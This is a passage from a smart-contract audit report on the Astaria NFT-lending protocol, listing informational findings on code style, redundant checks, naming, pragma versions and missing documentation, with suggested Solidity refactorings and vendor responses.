turned into a named constant: bytes32 private constant FLASH_ACTION_MAGIC = keccak256("FlashAction.onFlashAction"); The constant value can be used as the return value instead. +5.6.2 Define a named constant for permit typehash in ERC20-cloned Severity: Informational Context: ERC20-Cloned.sol#L121-L123 Description: In permit, the following type hash has been used: keccak256( "Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)" ) Recommendation: It would be best to define a named constant for the hash above and replace its usage with the named constant: bytes32 private constant PERMIT_TYPEHASH = keccak256( "Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)" ); +5.6.3 Unused struct, enum and storage fields can be removed Severity: Informational Context: • IAstariaRouter.sol#L38 • IAstariaRouter.sol#L41 • ICollateralToken.sol#L67 • ILienToken.sol#L22 • ICollateralToken.sol#L49 • ICollateralToken.sol#L42 Description: The struct, enum and storage fields in this context have not been used in the project. Recommendation: If there is no plan to use these fields, it would be best to remove them to simplify/clean the code base. 66 +5.6.4 WPStorage.expected's comment can be made more accurate Severity: Informational Context: WithdrawProxy.sol#L53 Description: In WPStorage's definition we have: uint88 expected; // Expected value of auctioned NFTs. yIntercept (virtual assets) of a PublicVault are ,! not modified on liquidation, only once an auction is completed. The comment for expected is not exactly accurate. The accumulated value in expected is the sum of all auctioned NFTs's amountOwed when (the timestamp) the liquidate function gets called. Whereas the NFTs get auctioned starting from their first stack's element's liquidationInitialAsk to 1_000 wei Recommendation: The comment for expected can be modified to emphasis that: The accumulated value in expected is the sum of all auctioned NFTs's amountOwed when (the times- tamp) the liquidate function gets called. +5.6.5 Leave comment that in WithdrawProxy.claim() the calculation of balance cannot underflow Severity: Informational Context: WithdrawProxy.sol#L235-L236 Description: There is this following line in claim() where balance is initialised: uint256 balance = ERC20(asset()).balanceOf(address(this)) - s.withdrawReserveReceived; With the current PublicVault implementation of IPublicVault, this cannot underflow since the increase in with- drawReserveReceived (using increaseWithdrawReserveReceived) is synced with increasing the asset balance by the same amount. Recommendation: The claim in the description needs to be doubled-checked. But the general recommendation is to leave a comment/explanation as in the description. +5.6.6 Shared logic in withdraw and redeem functions of WithdrawProxy can be turned into a shared modifier Severity: Informational Context: • WithdrawProxy.sol#L146-L152 • WithdrawProxy.sol#L169-L175 Description: withdraw and redeem both start with the following lines: WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } Since they have this shared logic at the beginning of their body, we can consolidate the logic into a modifier. Recommendation: Refactor the shared logic into a modifier that can be used by both functions. 67 modifier onlyWhenNoActiveAuction() { WPStorage storage s = _loadSlot(); // If auction funds have been collected to the WithdrawProxy // but the PublicVault hasn't claimed its share, too much money will be sent to LPs if (s.finalAuctionEnd != 0) { // if finalAuctionEnd is 0, no auctions were added revert InvalidState(InvalidStates.NOT_CLAIMED); } _; } +5.6.7 StrategyDetails version can only be used in custom implementation of IStrategyValidator, requires documentation Severity: Informational Context: IAstariaRouter.sol#L103 Description: StrategyDetails.version is never used in the current implementations of the validators. • If the intention is to avoid replays across different versions of Astaria, we should add a check for it in commit- ment validation functions. • A custom implementation of IStrategyValidator can make use of this value, but this needs documentation as to exactly what it refers to. Recommendation: Include documentation on how StrategyDetails.version will be used, and add a check to the validators if needed. +5.6.8 Define helper functions to tag different pieces of cloned data for ClearingHouse Severity: Informational Context: • ClearingHouse.sol#L22 • ClearingHouse.sol#L31 Description: _getArgAddress(0) and _getArgUint256(21) are used as the ROUTER() and COLLATERAL_ID() in the fallback implementation for ClearingHouse was Clone derived contract. Recommendation: It would be best to define endpoints for these different parameters to tag the pieces of cloned data like other similiar Clone contracts in the project. So we can define: function ROUTER() public pure returns (IAstariaRouter) { return IAstariaRouter(_getArgAddress(0)); } function COLLATERAL_ID() public pure returns (uint256) { return _getArgAddress(21); } and (to be consistent with other cloned contracts) function IMPL_TYPE() public pure returns (uint8) { return _getArgUint8(20); } and the fallback can be changed to: 68 fallback() external payable { IAstariaRouter ASTARIA_ROUTER = IAstariaRouter(ROUTER()); require(msg.sender == address(ASTARIA_ROUTER.COLLATERAL_TOKEN().SEAPORT())); WETH(payable(address(ASTARIA_ROUTER.WETH()))).deposit{value: msg.value}(); uint256 payment = ASTARIA_ROUTER.WETH().balanceOf(address(this)); ASTARIA_ROUTER.WETH().safeApprove( address(ASTARIA_ROUTER.TRANSFER_PROXY()), payment ); ASTARIA_ROUTER.LIEN_TOKEN().payDebtViaClearingHouse( COLLATERAL_ID(), payment ); } +5.6.9 A new modifier onlyVault() can be defined for WithdrawProxy to consolidate logic Severity: Informational Context: • WithdrawProxy.sol#L212 • WithdrawProxy.sol#L271 • WithdrawProxy.sol#L281 • WithdrawProxy.sol#L291 Description: The following require statement has been used in multiple functions including increaseWith- drawReserveReceived, drain, setWithdrawRatio and handleNewLiquidation. require(msg.sender == VAULT(), "only vault can call"); Recommendation: We can transform the require statement into a modifier and use the modifier instead for the functions in this context. modifier onlyVault() { require(msg.sender == VAULT(), "only vault can call"); _; } +5.6.10 Inconsistant pragma versions and floating pragma versions can be avoided Severity: Informational Context: Description: Most contracts in the project use pragma solidity ˆ0.8.17, but there are other variants as well: 69 pragma solidity ^0.8.16; pragma solidity ^0.8.16; pragma solidity ^0.8.16; // src/Interfaces/IAstariaVaultBase.sol // src/Interfaces/IERC4626Base.sol // src/Interfaces/ITokenBase.sol pragma solidity ^0.8.15; // src/Interfaces/ICollateralToken.sol pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; pragma solidity ^0.8.0; // src/Interfaces/IERC20.sol // src/Interfaces/IERC165.sol // src/Interfaces/IERC1155.sol // src/Interfaces/IERC1155Receiver.sol // src/Interfaces/IERC721Receiver.sol // src/utils/Math.sol pragma solidity >=0.8.0; pragma solidity >=0.8.0; // src/Interfaces/IERC721.sol // src/utils/MerkleProofLib.sol And they all have floating version pragmas. • In hardhat.config.ts, solidity: "0.8.13" is used. • In .prettierrc settings we have "compiler": "0.8.17" • In .solhint.json we have "compiler-version": ["error", "ˆ0.8.0"] • foundry.toml does not have a solc setting Recommendation: Unless a file is used as a library or used by other projects, it would be best to not have floating pragmas and assign the same pragma version to all the main files and use that fixed prgama version in other settings as well to make sure that the code gets compiled deterministally using the same compiler version. In this case the fixed pragma version would be =0.8.17. +5.6.11 IBeacon is missing a compiler version pragma Severity: Informational Context: IBeacon.sol#L11 Description: IBeacon is missing a compiler version pragma. Recommendation: It is recommend to add the compiler version pragma to this file: pragma solidity x.y.z; +5.6.12 zone and zoneHash are not required for fully open Seaport orders Severity: Informational Context: CollateralToken.sol#L524-L530 Description: As per Seaport's documentation,zone and zoneHash are not required for PUBLIC orders: The zone of the order is an optional secondary account attached to the order with two additional privi- leges: • The zone may cancel orders where it is named as the zone by calling cancel. (Note that offerers can also cancel their own orders, either individually or for all orders signed with their current counter at once by calling incrementCounter). • "Restricted" orders (as specified by the order type) must either be executed by the zone or the offerer, or must be approved as indicated by a call to an isValidOrder or isValidOrderIncludingEx- traData view function on the zone. 70 This order isn't "Restricted", and there is no way to cancel a Seaport order once created from this contract. Recommendation: You can consider removing zone and zoneHash if the plan is to keep Seaport orders fully open. Note: If applying this recommendation, applying this issue's fix is mandatory to Issue 150. +5.6.13 Inconsistent treatment of delegate setting Severity: Informational Context: VaultImplementation.sol#L195 Description: Private vaults include delegate in the allow list when deployed through the Router. Public vaults do not. The VaultImplementation, when mutating a delegate, sets them on allow list. Recommendation: Make consistent or note decision to have different deploy behaviors. +5.6.14 AstariaRouter does not adhere to EIP1967 spec Severity: Informational Context: AstariaRouter.sol#L48 Description: The Router serves as an implementation Beacon for proxy contracts, however, does not adhere to the EIP1967 spec. Recommendation: Inherit compliant IBeacon (e.g. OpenZeppelin) and make conform to the spec. +5.6.15 Type mismatch stack.point.end Severity: Informational Context: LienToken.sol#L757, PublicVault.sol#L509 Description: stack.point.end is uint40 but used elsewhere as uint64. +5.6.16 Receiver of bought out lien must be approved by msg.sender Severity: Informational Context: LienToken.sol#L107-111 Description: The buyoutLien function requires that either the receiver of the lien is msg.sender or is an address approved by msg.sender: if (msg.sender != params.encumber.receiver) { require( _loadERC721Slot().isApprovedForAll[msg.sender][params.encumber.receiver] ); } This check seems unnecessary and in some cases will block users from buying out liens as intended. Recommendation: Remove this check. Once it is removed, we can also remove the update at VaultImplementation.sol#L331-336 for private vaults to approve the vault owner before buyoutLien() is called: if ( recipient() != address(this) && !lienToken.isApprovedForAll(address(this), recipient()) ) { lienToken.setApprovalForAll(recipient(), true); } 71 Astaria: Fixed in PR 204. Spearbit: Verified, updates in this PR 276solve the issue. +5.6.17 A new modifer onlyLienToken() can be defined to refactor logic Severity: Informational Context: • PublicVault.sol#L487 • PublicVault.sol#L525 • PublicVault.sol#L574 • PublicVault.sol#L588 • PublicVault.sol#L604 Description: The following require statement has been used in multiple locations in PublicVault: require(msg.sender == address(LIEN_TOKEN())); Locations used: • beforePayment • afterPayment • handleBuyoutLien • updateAfterLiquidationPayment • updateVaultAfterLiquidation Recommendation: It would be best to consolidate this condition into a modifier. modifier onlyLienToken() { require(msg.sender == address(LIEN_TOKEN())); _; } +5.6.18 A redundant if block can be removed from PublicVault._afterCommitToLien Severity: Informational Context: • PublicVault.sol#L428-L430 • PublicVault.sol#L443 • PublicVault.sol#L443 Description: In PublicVault._afterCommitToLien, we have the following if block: if (s.last == 0) { s.last = block.timestamp.safeCastTo40(); } This if block is redundant, since regardless of the value of s.last, a few lines before _accrue(s) would update the s.last to the current timestamp. Recommendation: The if block above can be removed. And perhaps to emphasis that the s.last value is update in _accrue(s), we can leave a comment for it on a line above in _afterCommitToLien body. 72 +5.6.19 Private vaults' deposit endpoints can be potentially simplifed Severity: Informational Context: Vault.sol#L74-L77 Description: A private vault's deposit function can be called directly or indirectly using the ROUTER() (either way by anyone) and we have the following require statement: require( s.allowList[msg.sender] || (msg.sender == address(ROUTER()) && s.allowList[receiver]) ); If the ROUTER() is the AstariaRouter implementation of IAstariaRouter, then it inherits from ERC4626RouterBase and ERC4626Router which allows anyone to call into deposit of this private vault using: • depositToVault • depositMax • ERC4626RouterBase.deposit Thus if anyone of the above functions is called through the ROUTER(), msg.sender == address(ROUTER() will be true. Also, note that when private vaults are created using the newVault the msg.sender/owner along the delegate are added to the allowList and allowlist is enabled. And since there is no bookkeeping here for the receiver, except only the require statement, that means • Only the owner or the delegate of this private vault can call directly into deposit or • Anyone else can set the address to parameter of one of those 3 endpoints above to owner or delegate to deposit assets (wETH in the current implementation) into the private vault. And all the assets can be withdrawn by the owner only. Recommendation: We suggest documenting the above paths. The restriction on the receiver would make sense to make sure end users are aware that they are sending assets through the ROUTER() to an allowed listed user of the private vault and to avoid potential deposit mistakes. It would make sense to simplify the require statement though: require(s.allowList[receiver])); The current form of the require statement is also acceptable, although it would be best to document why this choice was taken (gas saving for the owner/delegate to set the receiver to address(0)) +5.6.20 The require statement in decreaseEpochLienCount can be more strict Severity: Informational Context: PublicVault.sol#L498 Description: decreaseEpochLienCount has the following require statement that limits who can call into it: require( msg.sender == address(ROUTER()) || msg.sender == address(LIEN_TOKEN()) ); So only, the ROUTER() and LIEN_TOKEN() are allowed to call into. But AstariaRouter never calls into this function. Recommendation: If you are not planning to add new functionalities to AstariaRouter that would call into a public vault's decreaseEpochLienCount endpoint, it is recommended to make this require statement more strict: require(msg.sender == address(LIEN_TOKEN())); 73 +5.6.21 amount is not used in _afterCommitToLien Severity: Informational Context: PublicVault.sol#L414 Description: amount is not used in _afterCommitToLien to update/decrement s.yIntercept, because even though assets have been transferred out of the vault, they would still need to be paid back and so the net ef- fect on s.yIntercept (that is used in the calculation of the total virtual assets) is 0. Recommendation: Comment out amount and also maybe provide an explanation in a NatSpec @dev of the reason that it has not been used. function _afterCommitToLien( uint40 lienEnd, uint256 lienId, uint256 /* amount */ , uint256 lienSlope ) internal virtual override { Also since _afterCommitToLien is only overridden with an actual implementation in this scenario, if amount is not needed it can be removed from the function signature completely. +5.6.22 Use modifier Severity: Informational Context: AstariaRouter.sol#L270, AstariaRouter.sol#L264, VaultImplementation.sol#L67-L99, VaultImplementa- tion.sol#L131, VaultImplementation.sol#L196 Description: Highlighted code have require checks on msg.sender which can be converted to modifiers. For instance: require(address(msg.sender) == s.guardian); Recommendation: Replace these checks with modifiers. +5.6.23 Prefer SafeCastLib for typecasting Severity: Informational Context: AstariaRouter.sol#L95-L106 Description: Highlighted code above does typecasting of several constant values. In case, some value doesn't fit in the type, this typecasting will silently ignore the higher order bits although that's currently not the case, but it may pose a risk if these values are changed in future. Recommendation: Consider using SafeCastLib for all typecastings. Astaria: Acknowledged. Spearbit: Acknowledged. 74 +5.6.24 Rename Multicall to Multidelegatecall Severity: Informational Context: Multicall.sol Description: Multicall.sol lets performs multiple delegatecalls. Hence, the name Multicall is not suitable. The contract and the file should be named Multidelegatecall. Recommendation: Update the name to Multidelegatecall, or replace delegatecall with call. +5.6.25 safeTransferFrom() without the data argument can be used Severity: Informational Context: CollateralToken.sol#LL347 Description: Highlighted code above sends empty data over an external call via ERC721.safeTransferFrom(from, to, tokenId, data): IERC721(underlyingAsset).safeTransferFrom( address(this), releaseTo, assetId, "" ); data can be removed since ERC721.safeTransferFrom(from, to, tokenId) sets empty data too. Recommendation: Remove the empty data argument from safeTransferFrom(). Astaria: Fixed in commit f63183. Spearbit: Verified. +5.6.26 Fix documentation that updateVaultAfterLiquidation can be called by LIEN_TOKEN, not ROUTER Severity: Informational Context: PublicVault.sol#L608 Description: The function has the correct validation that it can only be called by LIEN_TOKEN(), but the comment says it can only be called by ROUTER(). require(msg.sender == address(LIEN_TOKEN())); // can only be called by router Recommendation: Update the comment to say lien token or remove the comment entirely. +5.6.27 Declare event and constants at the beginning Severity: Informational Context: CollateralToken.sol#L598, VaultImplementation.sol#L150 Description: Events and constants are generally declared at the beginning of a smart contract. However, for the highlighted code above, that's not the case. Recommendation: Move event and constant declarations at the beginning of the contract. Astaria: Fixed in commit b55058. Spearbit: Verified. 75 +5.6.28 Rename Vault to PrivateVault Severity: Informational Context: Vault.sol#L34 Description: Vault contract is used to represent private vaults. Recommendation: To distinguish private and public vaults better, it would be best to rename Vault contract/file to PrivateVault. Note that public vaults are already called PublicVault. +5.6.29 Remove comment Severity: Informational Context: WithdrawProxy.sol#L229 Description: Comment at line WithdrawProxy.sol#L229 can be removed: if ( block.timestamp < s.finalAuctionEnd // || s.finalAuctionEnd == uint256(0) ) { The condition in comments is always false as the code already reverts in that case. Recommendation: Remove comment. Astaria: Fixed in commit 861bf. Spearbit: Verified. +5.6.30 WithdrawProxy and PrivateVault symbols are missing hyphens Severity: Informational Context: • WithdrawProxy.sol#L113 • Vault.sol#L55 Description: The symbol for the WithdrawProxy token is missing a hyphen after the W, which will make the name AST-W0x... instead of AST-W-0x.... Similarly, the symbol for the Private Vault token (in Vault.sol) is missing a hyphen after the V. Recommendation: - string(abi.encodePacked("AST-W", owner(), "-", ERC20(asset()).symbol())); + string(abi.encodePacked("AST-W-", owner(), "-", ERC20(asset()).symbol())); - string(abi.encodePacked("AST-V", owner(), "-", ERC20(asset()).symbol())); + string(abi.encodePacked("AST-V-", owner(), "-", ERC20(asset()).symbol())); 76 +5.6.31 Lien cannot be bought out after stack.point.end Severity: Informational Context: LienToken.sol#L731 Description: The _getRemainingInterest function reverts with Panic(0x11) when block.timestamp > stack.point.end. Recommendation: If intentional, include explicit check and informative error message, or include documentation to note decision. +5.6.32 Inconsistent strictness of inequalities in isValidRefinance Severity: Informational Context: AstariaRouter.sol#L593-612 Description: In isValidRefinance, we check that either: a) newRate < maxNewRate && newEnd >= oldEnd b) newEnd - oldEnd >= minDurationIncrease && newRate <= oldRate We should be consistent in whether we're enforcing the changes are strict inequalities or non-strict inequalities. Recommendation: Use strict inequalities (for slightly better gas performance) for the variables that need to im- In other words, keep newRate < maxNewRate as is, but change it so that newEnd - oldEnd > minDura- prove. tionIncrease. Alternatively, you could use non-strict inequalities and change it so that newRate <= maxNewRate. Astaria: Fixed in commit 0d2e24c. Spearbit: Verified. +5.6.33 Lengthy comments Severity: Informational Context: AstariaRouter.sol#L58, LienToken.sol#L38 Context provides a few examples of lengthy comments. For readability, it's better to restrict comment length per line. Solidity guidelines suggests 120 characters. Recommendation: Convert lengthy single line comments into multiple lines. To identify these comments, run awk 'length>120' *sol in src. +5.6.34 Clarify comments Severity: Informational Context: CollateralToken.sol#L524-L532 Description: Few comments are not clear on what they are referring to: zone: address(this), // 0x20 ... conduitKey: s.CONDUIT_KEY, // 0x120 Recommendation: Elaborate these comments or remove if they are not useful. 77 +5.6.35 Remove unused files Severity: Informational Context: CallUtils.sol Description: CallUtils.sol is not used anywhere in the codebase. Recommendation: Remove CallUtils.sol. +5.6.36 Document privileges and entities holding these privileges Severity: Informational Context: astaria-core Description: There are certain privileged functionalities in the codebase (recognized through requiresAuth mod- ifier). Currently, we have to refer to tests to identify the setup. Recommendation: Document these privileges along with the entities holding these privileges. Also document the process of setting up Auth/Authority for the contracts. +5.6.37 Document and ensure that maximum number of liens should not be set greater than 256 Severity: Informational Context: LienToken.sol#L625, LienToken.sol#L373-L375, LienToken.sol#L64 Description: Maximum number of liens in a stack is currently set to 5. While paying for a lien, the index in the stack is casted to uint8. This makes the implicit limit on maximum number of liens to be 256. Recommendation: Document this restriction and in case of any upgrade to this cap, ensure that all the related components are upgraded together to avoid the safe where casting down to uint8 becomes unsafe. +5.6.38 transferWithdrawReserve() can return early when the current epoch is 0 Severity: Informational Context: • PublicVault.sol#L338 • PublicVault.sol#L341 • PublicVault.sol#L380 • PublicVault.sol#L372 Description: If s.currentEpoch == 0, s.currentEpoch - 1 will wrap around to type(uint256).max and we will most probably will drain assets into address(0) in the following block: unchecked { s.withdrawReserve -= WithdrawProxy(withdrawProxy) .drain( s.withdrawReserve, s.epochData[s.currentEpoch - 1].withdrawProxy ) .safeCastTo88(); } But this cannot happen since in the outer if block the condition s.withdrawReserve > 0 indirectly means that s.currentEpoch > 0. The indirect implication above regarding the 2 conditions stems from the fact that s.withdrawReserve has only been set in transferWithdrawReserve() function or processEpoch(). In transferWithdrawReserve() function 78 it assumes a positive value only when s.currentEpoch > uint64(0) and in processEpoch() at the end we are incrementing ‘s.currentEpoch‘. Recommendation: uint64(0)) is turned into an early exit since it is a directly or indirectly implied condition for the whole function. It would be more readable to rewrite this function so that the if (s.currentEpoch > if (s.currentEpoch == uint64(0)) { return; } +5.6.39 2 of the inner if blocks of processEpoch() check for a condition that has already been checked by an outer if block Severity: Informational Context: PublicVault.sol#L247 Description: The following 2 if block checks are redundant: if (address(currentWithdrawProxy) != address(0)) { currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); } uint256 expected = 0; if (address(currentWithdrawProxy) != address(0)) { expected = currentWithdrawProxy.getExpected(); } Since the condition address(currentWithdrawProxy) != address(0) has already been checked by an outer if block. Recommendation: The 2 if blocks can be transformed into: currentWithdrawProxy.setWithdrawRatio(s.liquidationWithdrawRatio); uint256 expected = currentWithdrawProxy.getExpected(); +5.6.40 General formatting suggestions Severity: Informational Context: PublicVault.sol#L283 Description: • PublicVault.sol#L283 : there are extra sourounding paranthesis Recommendation: • PublicVault.sol#L283 : extra parenthesis can be removed: if (address(currentWithdrawProxy) != address(0)) { 79 +5.6.41 Identical collateral check is performed twice in _createLien Severity: Informational Context: LienToken.sol#L383-393 Description: In _createLien, a check is performed that the collateralId of the new lien matches the collateralId of the first lien on the stack. if (params.stack.length > 0) { if (params.lien.collateralId != params.stack[0].lien.collateralId) { revert InvalidState(InvalidStates.COLLATERAL_MISMATCH); } } This identical check is performed twice (L383-387 and L389-393). Recommendation: Delete L389-393. Astaria: Fixed in commit 81a542. Spearbit: Verified. +5.6.42 checkAllowlistAndDepositCap modifer can be defined to consolidate some of the mint and deposit logic for public vaults Severity: Informational Context: • PublicVault.sol#L202-L210 • PublicVault.sol#L226-L234 Description: The following code snippet has been used for both mint and deposit endpoints of a public vault: VIData storage s = _loadVISlot(); if (s.allowListEnabled) { require(s.allowList[receiver]); } uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Recommendation: We can transform the snippet above into a modifier checkAllowlistAndDeposit- Cap(address receiver) to consolidate some of the logic. It would also simplify the codebase. +5.6.43 Document why bytes4(0xffffffff) is chosen when CollateralToken acting as a Seaport zone to signal invalid orders Severity: Informational Context: • CollateralToken.sol#L148 • CollateralToken.sol#L163 CollateralToken's Description: bytes4(0xffffffff) to indicate a Seaport order using this zone is not a valid order. Recommendation: Document why the specific value of bytes4(0xffffffff) was chosen to indicate the invalidity of an order using CollateralToken as a zone. isValidOrderIncludingExtraData isValidOrder return and 80 Seaport uses this value in one of its test files. Also EIP-165 uses this magic value to indicate an unsupported interface. +5.6.44 CollateralToken.onERC721Received's use of depositFor stack variable is redundant Severity: Informational Context: CollateralToken.sol#L652-L665 Description: If we follow the logic of assigning values to depositFor in CollateralToken.onERC721Received, we notice that it will end up being from_. So its usage is redundant. Recommendation: Remove depositFor from CollateralToken.onERC721Received and replace its usage with from_: _mint(from_, collateralId); s.idToUnderlying[collateralId] = Asset({ tokenContract: msg.sender, tokenId: tokenId_ }); emit Deposit721(msg.sender, tokenId_, collateralId, from_); Also, if the above change is applied operator will not be used and so it can be commented out in the function signature: function onERC721Received( address /* operator_ */ , address from_, uint256 tokenId_, bytes calldata data_ ) external +5.6.45 onlyOwner modifier can be defined to simplify the codebase Severity: Informational Context: • CollateralToken.sol#L323-L326 • CollateralToken.sol#L254-L259 Description: releaseToAddress checks whether the msg.sender is an owner of a collateral. CollateralToken already has a modifier onlyOwner(...), so the initial check in releaseToAddress can be delegated to the modifier. Recommendation: releaseToAddress can be changed to the following to take advantage of the onlyOwner modifier: function releaseToAddress(uint256 collateralId, address releaseTo) public releaseCheck(collateralId) onlyOwner(collateralId) // <-- added modifier { } CollateralStorage storage s = _loadCollateralSlot(); _releaseToAddress(s, collateralId, releaseTo); The only difference is that the releaseToAddress uses a custom error to revert, but the modifier uses a require statement. 81 +5.6.46 Document liquidator's role for the protocol Severity: Informational Context: • AstariaRouter.sol#L519 • CollateralToken.sol#L107 • LienToken.sol#L472-L477 Description: When a lien's term end (stack.point.end <= block.timestamp), anyone can call the liquidate on AstariaRouter. There is no restriction on the msg.sender. The msg.sender will be set as the liquidator and if: • The Seaport auction ends (3 days currently, set by the protocol), they can call liquidatorNFTClaim to claim the NFT. • Or if the Seaport auction settles, the liquidator receives the liquidation fee. Recommendation: Document liquidator's role for the protocol covering the points mentioned in the Description. +5.6.47 Until ASTARIA_ROUTER gets filed for CollateralToken, CollateralToken can not receive ERC721s safely. Severity: Informational Context: CollateralToken.sol#L72-L78 Description: ASTARIA_ROUTER is not set in the CollateralToken's constructor. So till an entity with an author- ity would file for it, CollateralToken is unable to safely receive an ERC721 token ( whenNotPaused and on- ERC721Received would revert). Recommendation: If this is part of the design decision, it might be useful to have it documented. +5.6.48 _getMaxPotentialDebtForCollateral might have meant to be an internal function Severity: Informational Context: LienToken.sol#L667-L668 Description: _getMaxPotentialDebtForCollateral is defined as a public function. underscore which as a convention usually is used for internal or private functions. Recommendation: If it is necessary to use this pure function off-chain, it is recommended to chain its name to not start with _ or if its meant to be an internal function, make sure to change its visibility to internal. _getMaxPotentialDebtForCollateral is made internal in the following PR 102. Its name starts with _- +5.6.49 return keyword can be removed from stopLiens Severity: Informational Context: LienToken.sol#L240-L247 Description: _stopLiens does not return any values but in stopLiens the return statement is used along with the non-existent return value of _stopLiens. Recommendation: stopLiens can be changed to: 82 - return _stopLiens( _loadLienStorageSlot(), collateralId, auctionWindow, stack, liquidator ); +5.6.50 LienToken's constructor does not set ASTARIA_ROUTER which makes some of the endpoints unfunc- tional Severity: Informational Context: LienToken.sol#L56-L65 Description: LienToken's constructor does not set ASTARIA_ROUTER. That means till an authorized entity calls file to set this parameter, the following functions would be broken/revert: • buyoutLien • _buyoutLien • _payDebt • getBuyout • _getBuyout • _isPublicVault • setPayee, partially broken • _paymentAH • payDebtViaClearingHouse Recommendation: Document the current design's decision as to not set the ASTARIA_ROUTER in the constructor. Astaria: Working as intended Spearbit: Acknowledged. +5.6.51 Document the approval process for a user's CollateralToken before calling commitToLiens Severity: Informational Context: • AstariaRouter.sol#L680-L683 • VaultImplementation.sol#L232 Description: In the _executeCommitment's return statement: IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( c, address(this) ); address(this) is the AstariaRouter. The call here to commitToLien enters into _validateCommitment with AstariaRouter as the receiver and so for it to no revert, the holder would have needed to set the approval for the router previously/beforehand: CT.isApprovedForAll(holder, receiver) // needs to be true 83 Recommendation: Document and comment for the users that for them to commit to liens they would need to approve all CollateralToken's tokens for AstariaRouter so that AstariaRouter can act as an operator/spender. +5.6.52 isValidRefinance's return statement can be reformatted Severity: Informational Context: AstariaRouter.sol#L606-L611 Description: Currently, it is a bit hard to read the return statement of isValidRefinance. Recommendation: We suggest to reformat the statement similiar to the following for better readability: ( newLien.details.rate < maxNewRate && block.timestamp + newLien.details.duration >= stack[position].point.end ) || ( newLien.details.rate <= stack[position].lien.details.rate && block.timestamp + newLien.details.duration - stack[position].point.end >= s.minDurationIncrease ); +5.6.53 Withdraw Reserves should always be transferred before Commit to Lien Severity: Informational Context: PublicVault.sol#L387-398 Description: When a new lien is requested, the _beforeCommitToLien() function is called. If the epoch is over, this calls processEpoch(). Otherwise, it calls transferWithdrawReserve(). function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } } However, the processEpoch() function will fail if the withdraw reserves haven't been transferred. In this case, it would require the user to manually call transferWithdrawReserve() to fix things, and then request their lien again. Instead, the protocol should transfer the reserves whenever it is needed, and only then call processEpoch(). Recommendation: 84 function _beforeCommitToLien( IAstariaRouter.Commitment calldata params, address receiver ) internal virtual override(VaultImplementation) { VaultData storage s = _loadStorageSlot(); if (timeToEpochEnd() == uint256(0)) { processEpoch(); } else if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); if (s.withdrawReserve > uint256(0)) { transferWithdrawReserve(); } if (timeToEpochEnd() == uint256(0)) { processEpoch(); - - - - + + + + + } } Astaria: Fixed in PR 189. Spearbit: Verified. +5.6.54 Remove owner() variable from withdraw proxies Severity: Informational Context: PublicVault.sol#L182-192 Description: When a withdrawProxy is deployed, it is created with certain immutable arguments. Two of these values are owner() and vault(), and they will always be equal. They seem to be used interchangeably on the withdraw proxy itself, so should be consolidated into one variable. Recommendation: Remove owner from the immutable arguments passed to withdrawProxy, and change all in- stances of owner() used to vault(). Astaria: Fixed in PR 190. Spearbit: Verified. +5.6.55 Unnecessary checks in _validateCommitment Severity: Informational Context: VaultImplementation.sol#L220-234 Description: In _validateCommitment(), we check to confirm that either the sender of the message is adequately qualified to be making the decision to take a lien against the collateral (ie they are the holder, the operator, etc). However, the way this is checked is somewhat roundabout and can be substantially simplified. For example, we check require(operator == receiver); in a block that is only triggered if we've already validated that receiver != operator. Recommendation: To fix these unnecessary checks, I'd recommend refactoring as follows: 85 address holder = CT.ownerOf(collateralId); address operator = CT.getApproved(collateralId); if ( msg.sender != holder && receiver != holder && receiver != operator && !ROUTER().isValidVault(receiver) !ROUTER().isValidVault(receiver) && !CT.isApprovedForAll(holder, receiver) ) { if (operator != address(0)) { require(operator == receiver); } else { require(CT.isApprovedForAll(holder, receiver)); revert ReceiverIsNotAllowed(); } } - + + - - - - + However, there are larger issues with this validation, and fixing these issues will resolve this. See PR 75 +5.6.56 Comment or remove unused function parameters Severity: Informational Context: • LienToken.sol#LL573 • CollectionValidator.sol#L51 • CollateralToken.sol#L627 • VaultImplementation.sol#L107-L110 • PublicVault.sol#L389 • PublicVault.sol#L537 • LienToken.sol#L195 • LienToken.sol#L294 • LienToken.sol#L410 • LienToken.sol#L726 • VaultImplementation.sol#L341 Description: Highlighted functions above take arguments which are never used. particular signature, comment that argument name, otherwise remove that argument completely. If the function has to have a Additional instances noted in Context above. • LienToken.sol#L726 : LienStorage storage s input parameter is not used in _getRemainingInterest. It can be removed and this function can be pure. • VaultImplementation.sol#L341 : incoming is not used buyoutLien, was this variable meant to be used? Recommendation: Remove collateralId from _paymentAH() arguments. If commenting out a parameter but keeping its type to conform to a particular signature you can use the following form: 86 function f( A a, B b, ... C /* c */ , ... X x ) ... +5.6.57 Zero address check can never fail Severity: Informational Context: CollectionValidator.sol#L63, UNI_V3Validator.sol#L93, UniqueValidator.sol#L64 Description: The details.borrower != address(0) check will never be false in the current system as AstariaRouter.sol#L352-L354 will revert when ownerOf is address(0). Recommendation: If this check is intended to assist off chain calls to validateAndParse, consider reverting whenever details.borrower != address(0). +5.6.58 UX differs between Router.commitToLiens and VaultImplementation.commitToLien Severity: Informational Context: VaultImplementation.sol#L277 Description: The Router function creates the Collateralized Token while the VaultImplementation requires the collateral owner to ERC721.safeTransferFrom to the CollateralToken contract prior to calling. Recommendation: UX Implications only. Confirm this is desired behavior and document. +5.6.59 Document what vaults are listed by Astaria Severity: Informational Context: AstariaRouter.sol#L443 Description: Anyone can call newPublicVault with epochLength in the correct range to create a public vault. Recommendation: It would be best to document the process of listing and selecting public vaults, as the protocol currently allows anyone to register a public vault. Astaria: This is correct, anyone can deploy a public vault but the UI will only show vaults by whitelisted strategists. Spearbit: Acknowledged. +5.6.60 Simplify nested if/else blocks in for loops Severity: Informational Context: 